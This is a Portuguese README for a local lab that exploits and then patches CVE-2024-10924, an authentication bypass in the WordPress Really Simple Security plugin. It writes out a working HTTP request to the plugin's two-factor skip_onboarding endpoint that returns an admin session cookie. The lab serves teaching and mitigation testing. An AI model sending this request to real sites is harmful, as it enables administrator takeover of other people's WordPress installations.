
Demonstra exploração e mitigação de CVE-2024-10924, um bypass de autenticação no WordPress Really Simple Security, com exploit Python automatizado, etapas manuais no Burp Suite e verificação de patch.
Este projeto demonstra a exploração e mitigação do CVE-2024-10924, uma vulnerabilidade crítica de bypass de autenticação no plugin "Really Simple Security" do WordPress.
Inicie o ambiente WordPress vulnerável: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Verifique se os contêineres estão em execução: docker ps
Acesse o WordPress: http://localhost:1337
Ferramentas necessárias:
Execute a varredura GVM contra o alvo:
Método A - Exploit automatizado em Python: python exploit.py
Método B - Burp Suite manual:
Intercepte o tráfego para http://localhost:1337
Envie requisição POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Observe a resposta com cabeçalho Set-Cookie contendo sessão de admin
Resultado esperado:
Aplique o patch para bloquear o endpoint vulnerável: .\patch.ps1
O que isso faz:
Execute novamente o exploit (Método A ou B): python exploit.py
Resultado esperado após a mitigação:
Para parar o ambiente: docker-compose down
Para visualizar logs do contêiner: docker-compose logs -f
Para acessar o admin do WordPress legitimamente: http://localhost:1337/wp-admin (Verifique docker-compose.yml para credenciais)